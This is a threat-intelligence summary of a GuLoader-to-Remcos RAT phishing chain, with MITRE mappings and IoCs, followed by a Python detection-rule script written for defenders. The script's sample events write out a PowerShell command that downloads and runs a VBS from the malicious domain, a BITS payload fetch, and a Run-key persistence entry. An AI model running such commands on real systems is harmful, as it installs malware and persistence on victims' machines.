Tax Season Alert: Beware of GuLoader and Remcos RAT

eSentire’s TRU observed tax-themed phishing campaigns in Feb–Mar 2024 delivering Remcos RAT via a GuLoader chain that used password-protected ZIPs hosted on Adobe Document Cloud together with a malicious LNK and PowerShell scripts. The attack chain downloads a file with a PNG extension from jantickee[.]com, saves it as a VBS, spawns an obfuscated PowerShell script to retrieve a Base64-encoded GuLoader payload (Startvrdier.Fre) into %AppData%, and establishes persistence via a Registry Run key. #GuLoader #Remcos #AdobeDocumentCloud

Keypoints

  • Tax-themed phishing emails delivered Remcos RAT as the final payload using GuLoader as the loader.
  • Malicious content was distributed via password-protected ZIP archives hosted on Adobe Document Cloud to appear legitimate.
  • The ZIP contained an encrypted document (2023clearance.doc, MD5: 35b78f9b…) and a shortcut BurkeDocuments.pdf.lnk (MD5: 6213ff41…), which triggers execution.
  • The LNK launches a PowerShell command that downloads a supposed PNG from hxxps://jantickee[.]com/wp-content/Stanles2.png, saves it as Fjoua.vbs in Public, and executes it while dropping a decoy PDF (Shl3Dfdr.pdf).
  • The VBS spawns a heavily obfuscated PowerShell script that reconstructs strings, uses the BITS/BitTransfer module to retrieve and decode a Base64 GuLoader payload (Startvrdier.Fre) into %AppData%, and extracts an inner GuLoader blob via substring operations.
  • Persistence is established by adding the obfuscated PowerShell to the Registry Run key to execute on startup.
  • Investigators noted the original delivery URL went offline but recovered payloads from an alternative similar URL and documented multiple related indicators of compromise.

MITRE Techniques

  • [T1566] Phishing – Delivery vector used tax-themed phishing emails to lure victims; (‘we observed a series of tax-themed phishing emails delivering the Remcos RAT as the final payload through GuLoader’).
  • [T1204] User Execution – Execution relied on a shortcut file that triggers commands when opened; (‘the shortcut file initiates a PowerShell command to download a file from the specified URL’).
  • [T1059.001] PowerShell – Malicious PowerShell scripts were spawned and executed to reconstruct payloads and perform downloads; (‘The retrieved VBS file spawns the heavily obfuscated PowerShell script’).
  • [T1105] Ingress Tool Transfer – The BitTransfer module (BITS) was used to download the GuLoader payload from the Internet; (‘The PowerShell script is responsible for retrieving the GuLoader payload via the BitTransfer module in PowerShell’).
  • [T1027] Obfuscated Files or Information – Scripts were heavily obfuscated and used position-based string concatenation to hide payloads; (‘manipulates strings by selectively concatenating characters based on their positions’).
  • [T1036] Masquerading – The payload used misleading file extensions to appear benign (PNG image extension used for malicious content); (‘despite its PNG image extension, contains malicious content’).
  • [T1547.001] Registry Run Keys / Startup Folder – Persistence was achieved via a Registry Run key to execute the obfuscated PowerShell at startup; (‘The persistence is achieved via the Registry Run Key to execute the obfuscated PowerShell script’).

Indicators of Compromise

  • [File hash] Downloaded artifacts – 2023clearance.doc (MD5: 35b78f9b4f1122f4a347c1ce37367278), BurkeDocuments.pdf.lnk (MD5: 6213ff411cd8625c632de49cd6fe46c6).
  • [File names] Dropped/created files – Fjoua.vbs (downloaded & executed), Shl3Dfdr.pdf (decoy PDF), Startvrdier.Fre (Base64-encoded GuLoader payload in %AppData%).
  • [Domain/URL] Payload download source – hxxps://jantickee[.]com/wp-content/Stanles2.png (PNG extension but malicious content); original Adobe-hosted ZIP link on Adobe Document Cloud (password-protected ZIP) used for delivery.
  • [Other] Alternate artifacts – substring-extracted inner GuLoader blob from decoded payload and Registry Run key entries for persistence (see article for exact registry name and values).

The phishing messages contained a password-protected ZIP hosted on Adobe Document Cloud that held an encrypted document (2023clearance.doc, MD5 35b78f9b…) and a malicious shortcut BurkeDocuments.pdf.lnk (MD5 6213ff41…). Executing the LNK launches a PowerShell command which downloads a file from hxxps://jantickee[.]com/wp-content/Stanles2.png (a disguised PNG that is actually malicious), saves it as Fjoua.vbs in the Public folder, and runs it while dropping a decoy PDF (Shl3Dfdr.pdf).

The VBS spawns a heavily obfuscated PowerShell script that rebuilds hidden strings by selecting characters at specific offsets, then uses the BITS/BitTransfer module to retrieve a Base64-encoded GuLoader payload (written as Startvrdier.Fre under %AppData%). The script performs a substring extraction (e.g., “$Stadholder=$Regaliernes2.substring(315836,26965)”) to carve an inner GuLoader blob out of the decoded data, indicating nested loader layers that are decoded and executed in memory or dropped for subsequent stages.

Persistence is achieved by creating a Registry Run key that executes the obfuscated PowerShell on startup, completing the chain that leads to the Remcos RAT as the final payload. Investigators noted the original delivery URL went offline but recovered similar payloads via alternate URLs and documented the file hashes, filenames, and domains listed above for detection and response.
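The chain described in the Keypoints and in the three paragraphs above maps cleanly onto a handful of telemetry checks. The following Python is an added example, not code from eSentire or from the article: a small rule engine that runs behavioural rules (explorer-spawned PowerShell fetching a URL, an image-extension URL written to a script under C:\Users\Public, a script host running from Public, PowerShell spawned by wscript, BITS transfer from PowerShell, a Run key value that launches PowerShell) plus an IoC match over Sysmon-style process-creation and registry-set events. The only real values are the domain, MD5 hashes and file names listed in the Indicators section; the sample events are constructed to resemble the chain, the payload host and the Run key value name are placeholders because the summary does not give them, and T1059.005 (Visual Basic) is used for the VBS stage even though the summary lists only T1059.001.

```python
"""Detection rules for the GuLoader -> Remcos chain (added example).

Runs behavioural checks and an IoC match over constructed Sysmon-style events.
"""
import re
from collections import Counter

# Indicators lifted from the summary above (the only real values here).
IOC_DOMAINS = {"jantickee.com"}
IOC_MD5 = {"35b78f9b4f1122f4a347c1ce37367278", "6213ff411cd8625c632de49cd6fe46c6"}
IOC_FILENAMES = {"2023clearance.doc", "burkedocuments.pdf.lnk", "fjoua.vbs",
                 "shl3dfdr.pdf", "startvrdier.fre"}

URL_IMAGE_RE = re.compile(r"https?://\S+\.(?:png|jpg|gif)\b")
SCRIPT_OUT_RE = re.compile(r"\\public\\[^\s\"']+\.(?:vbs|js|ps1|hta)\b")
RUN_KEY_RE = re.compile(r"\\currentversion\\run\\")


def refang(s):
    """Lower-case and undo the hxxp / [.] defanging used in threat reports."""
    return s.replace("hxxp", "http").replace("[.]", ".").lower()


def norm(ev):
    """Normalise every string field so the rules can be case-blind."""
    return {k: refang(v) if isinstance(v, str) else v for k, v in ev.items()}


def matched_iocs(ev):
    """Known indicators that appear anywhere in a normalised event."""
    blob = " ".join(v for v in ev.values() if isinstance(v, str))
    return sorted(i for i in IOC_DOMAINS | IOC_MD5 | IOC_FILENAMES if i in blob)


def _is(ev, field, *names):
    return any(ev.get(field, "").endswith(n) for n in names)


# (rule name, technique, predicate); each maps to one step of the described chain.
RULES = [
    ("image_url_written_as_script", "T1036",
     lambda ev: ev.get("type") == "process"
     and bool(URL_IMAGE_RE.search(ev.get("cmdline", "")))
     and bool(SCRIPT_OUT_RE.search(ev.get("cmdline", "")))),
    # an LNK double-click appears as explorer.exe -> powershell.exe with a URL
    ("explorer_powershell_download", "T1204",
     lambda ev: _is(ev, "image", "powershell.exe")
     and _is(ev, "parent_image", "explorer.exe") and "http" in ev.get("cmdline", "")),
    ("script_host_runs_from_public", "T1059.005",
     lambda ev: _is(ev, "image", "wscript.exe", "cscript.exe")
     and "\\users\\public\\" in ev.get("cmdline", "")),
    ("powershell_from_script_host", "T1059.001",
     lambda ev: _is(ev, "image", "powershell.exe")
     and _is(ev, "parent_image", "wscript.exe", "cscript.exe")),
    ("powershell_bits_transfer", "T1105",
     lambda ev: _is(ev, "image", "powershell.exe") and "bitstransfer" in ev.get("cmdline", "")),
    ("run_key_launches_powershell", "T1547.001",
     lambda ev: ev.get("type") == "registry"
     and bool(RUN_KEY_RE.search(ev.get("target_object", "")))
     and "powershell" in ev.get("details", "")),
    ("known_ioc", "IoC", lambda ev: bool(matched_iocs(ev))),
]


def scan(events):
    """Run every rule over every event; one hit record per (event, rule) match."""
    hits = []
    for i, raw in enumerate(events):
        ev = norm(raw)
        for name, technique, pred in RULES:
            if pred(ev):
                hits.append({"event": i, "rule": name, "technique": technique})
    return hits


def techniques(events):
    """Hits per technique: a quick view of how much of the chain fired."""
    return Counter(h["technique"] for h in scan(events))


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed sample telemetry shaped after the chain, not captured events.
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\explorer.exe",
     "parent_image": r"C:\Windows\System32\userinit.exe", "cmdline": "explorer.exe"},
    {"type": "process", "image": PS, "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r'powershell.exe -w hidden -c "iwr hxxps://jantickee[.]com/wp-content/Stanles2.png '
                r'-OutFile C:\Users\Public\Fjoua.vbs; start C:\Users\Public\Shl3Dfdr.pdf; '
                r'wscript C:\Users\Public\Fjoua.vbs"'},
    {"type": "process", "image": r"C:\Windows\System32\wscript.exe", "parent_image": PS,
     "cmdline": r"wscript.exe C:\Users\Public\Fjoua.vbs"},
    # payload host is not given in the summary, so a placeholder host is used
    {"type": "process", "image": PS, "parent_image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'powershell.exe -c "Import-Module BitsTransfer; Start-BitsTransfer '
                r'-Source hxxps://payload-host.invalid/Startvrdier.Fre '
                r'-Destination C:\Users\victim\AppData\Roaming\Startvrdier.Fre"'},
    # value name is a placeholder; the summary defers the real one to the article
    {"type": "registry", "image": PS,
     "target_object": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\PLACEHOLDER_VALUE",
     "details": 'powershell.exe -windowstyle hidden -command "(obfuscated body omitted)"'},
    # two benign events that must not fire
    {"type": "process", "image": PS, "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-Process"},
    {"type": "registry", "image": r"C:\Program Files\OneDrive\OneDrive.exe",
     "target_object": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "details": r"C:\Program Files\OneDrive\OneDrive.exe /background"},
]

if __name__ == "__main__":
    for h in scan(SAMPLE_EVENTS):
        print(h)
    print(dict(techniques(SAMPLE_EVENTS)))
```

On the constructed sample the four malicious events fire nine hits across six techniques while the two benign events stay silent. The behavioural rules are the durable part: the domain and file names will rotate, and the `substring(315836,26965)` offsets quoted above are specific to one build of the loader, so they are worth logging but not worth a rule. The explorer-to-PowerShell-with-URL and BITS rules do match legitimate administration in some environments and should be paired with an allowlist of known scripts before alerting.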

Read more: https://www.esentire.com/blog/tax-season-alert-beware-of-guloader-and-remcos-rat